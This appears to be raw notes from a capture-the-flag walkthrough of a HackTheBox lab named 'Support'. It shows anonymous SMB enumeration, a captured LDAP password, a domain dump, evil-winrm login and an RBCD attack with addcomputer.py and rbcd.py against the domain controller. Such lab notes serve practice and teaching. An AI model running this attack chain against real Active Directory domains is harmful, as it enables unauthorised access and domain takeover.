SMB         10.10.11.174    445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)

┌──(root㉿kali)-[~/Desktop/Support]
└─# smbclient -L 10.10.11.174 -U ""
Password for [WORKGROUP\\]:

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share
    support-tools   Disk      support staff tools
    SYSVOL          Disk      Logon server share

┌──(root㉿kali)-[~/Desktop/Support]
└─# smbclient -N [//10.10.11.174/support-tools](notion://10.10.11.174/support-tools)
Try "help" to get a list of possible commands.
smb: \\> ls
.                                   D        0  Thu Jul 21 01:01:06 2022
..                                  D        0  Sat May 28 19:18:25 2022
7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 19:19:19 2022
npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 19:19:55 2022
putty.exe                           A  1273576  Sat May 28 19:20:06 2022
SysinternalsSuite.zip               A 48102161  Sat May 28 19:19:31 2022
UserInfo.exe.zip                    A   277499  Thu Jul 21 01:01:07 2022
windirstat1_1_2_setup.exe           A    79171  Sat May 28 19:20:17 2022
WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 19:19:43 2022

support\\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

ldapsearch -x -H ldap://10.10.10.161 -b "dc=support,dc=htb"

[LDAP] Attempting to parse an old simple Bind request.
[LDAP] Cleartext Client   : 192.168.77.131
[LDAP] Cleartext Username : support\\ldap
[LDAP] Cleartext Password : nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
[Analyze mode: Browser] Datagram Request from IP: 192.168.77.1 hostname: DESKTOP-9GV6IKT via the: File Server to: WORKGROUP. Service: Local Master Browser

ldapdomaindump 'ldap://support.htb' -u 'support.htb\\ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'

found password-like strings inside doamin_users.json, for username ‘support’

evil-winrm -u support -p 'Ironside47pleasure40Watchful' -i support.htb

use bloodhound

addcomputer.py -computer-name 'evil$' -computer-pass 'password' -dc-ip 10.129.227.255 'support.htb/support:Ironside47pleasure40Watchful'

rbcd.py -delegate-from 'evil$' -delegate-to 'dc$' -action 'write' 'support.htb/support:Ironside47pleasure40Watchful'